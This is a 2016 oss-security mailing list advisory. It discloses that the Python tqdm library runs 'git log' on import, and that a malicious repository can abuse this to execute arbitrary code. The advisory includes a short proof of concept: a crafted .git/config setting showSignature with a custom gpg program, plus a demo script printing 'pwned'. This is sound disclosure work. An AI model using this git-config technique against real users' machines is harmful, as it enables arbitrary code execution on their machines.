Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 25 Dec 2016 21:47:43 +0100
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: tqdm: insecure use of git

tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for 
Python".

When you import tqdm, the tqdm._version module executes the following command:

    git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm.
But cwd might be a part of an unrelated git repository, possibly a malicious 
one. At least with git 2.10 or later, it's possible to craft a repo in which 
"git log" executes arbitrary code:

    $ tail -n4 /tmp/.git/config
    [log]
            showSignature = true
    [gpg]
            program = /tmp/moogpg

    $ tail -n4 /tmp/moogpg
    #!/bin/sh
    exec > /dev/tty 2>&1
    cowsay pwned
    sleep 9999

    $ cd /tmp

    $ pydoc tqdm
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||


Upstream bug report:
https://github.com/tqdm/tqdm/issues/328

Affected versions: v4.4.1 and later.

-- 
Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ